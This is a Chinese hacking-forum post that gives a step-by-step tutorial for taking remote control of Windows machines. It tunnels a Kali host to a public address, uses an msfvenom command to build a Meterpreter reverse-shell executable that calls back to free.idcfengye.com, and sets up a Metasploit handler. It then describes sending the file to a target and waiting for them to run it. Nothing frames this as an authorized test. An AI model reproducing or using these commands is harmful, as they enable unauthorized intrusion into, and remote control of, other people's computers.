跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

Kali Linux Windows渗透教程从0到解决思路。


HACK1949

推荐的帖子

简介:

Kali Linux的前身是BackTrack Linux发行版。Kali Linux是一个基于Debian的Linux发行版,它被认为是最好的渗透测试的 Linux 发行版之一,而且名副其实。

Kali常用配置和基本使用:

Kali工具集介绍 修改Kali源和更新软件 Kali伪装成win10 Kali启动root用户

1.外网步骤思想图

Ngrok穿透成公网Ip---> Kali LinuxIP穿透出去-----> 生成Shell.exe ----->监听当前Ip是否点击---->目标电脑发送exe---->点击shell.exe

1、进入Ngrok网站注册一个用户()

2.下载Kali LInux版本

1.根据攻击机系统情况下载客户端版本(这里下载Linux 64bita版本)

2. 拖入虚拟器托不进去看上一个教程 解压zip

3.进入解压好的目录: 报错Tcp就重新去Ngrok重新换一个隧道免费很多人用

./sunny clientid id =>隧道id

启动了当前窗口不要关闭

3、MSF生成外网MM

不加Tcp不然报错 msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com:10161 lport=10306 -f exe -o /home/shell.exe

4、打开msf设置payload,加载攻击模块设置本地IP和监听端口

msfconsole 开启

5.绑定当前端口Ip

use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 当前Ip Kali set LPORT 4444
  1. show options (查看IP端口设置情况)
  2. run (开启监听)

6.等待对方点击shell.exeMM

成功就有meterpreter命令行 执行命令即可

总结:

就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->

链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...